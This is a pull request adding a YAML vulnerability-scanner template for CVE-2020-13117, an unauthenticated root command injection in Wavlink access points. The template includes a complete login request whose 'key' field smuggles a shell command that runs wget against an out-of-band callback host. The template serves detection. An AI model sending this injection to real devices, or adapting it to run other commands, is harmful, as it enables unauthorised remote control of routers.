### PR TITLE
Create CVE-2020-13117.yaml

### DIFF
--- a/cves/2020/CVE-2020-13117.yaml
+++ b/cves/2020/CVE-2020-13117.yaml
@@ -24,10 +24,8 @@ requests:
         Connection: close
 
         newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
-
     matchers:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-

--- a/cves/2020/CVE-2020-13117.yaml
+++ b/cves/2020/CVE-2020-13117.yaml
@@ -5,9 +5,9 @@ info:
   author: gy741
   severity: critical
   description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.
-  tags: cve,cve2020,wavlink,rce,oob
   reference:
     - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
+  tags: cve,cve2020,wavlink,rce,oob
 
 requests:
   - raw:

--- a/cves/2020/CVE-2020-13117.yaml
+++ b/cves/2020/CVE-2020-13117.yaml
@@ -1,0 +1,33 @@
+id: CVE-2020-13117
+
+info:
+  name: Wavlink Multiple AP - Unauthenticated RCE
+  author: gy741
+  severity: critical
+  description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.
+  tags: cve,cve2020,wavlink,rce,oob
+  reference:
+    - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/login.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        Origin: http://{{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Connection: close
+
+        newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2020-13117.

```
Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.
```

- References: https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html

### Template Validation

I've validated this template locally?
- [ ] YES
- [v] NO